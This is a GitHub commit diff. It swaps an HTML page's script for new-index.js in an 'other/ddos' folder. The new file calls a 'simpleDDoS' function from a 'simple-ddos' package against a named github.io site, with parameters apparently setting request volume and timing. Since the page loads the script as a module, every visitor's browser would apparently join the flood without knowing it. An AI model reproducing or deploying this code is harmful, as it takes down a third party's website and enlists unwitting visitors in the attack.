This commit is contained in:
Boof 2023-02-28 14:01:06 +01:00 committed by GitHub
parent bf2d1a2b6f
commit 599f011b1c
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 4 additions and 1 deletions

View File

@ -1 +1 @@
<script src="index.js" type="module"></script>
<script src="new-index.js" type="module"></script>

3
other/ddos/new-index.js Normal file
View File

@ -0,0 +1,3 @@
import { simpleDDoS } from 'simple-ddos'
simpleDDoS(5, 'https://t0m0t0w.github.io', 500, 1000)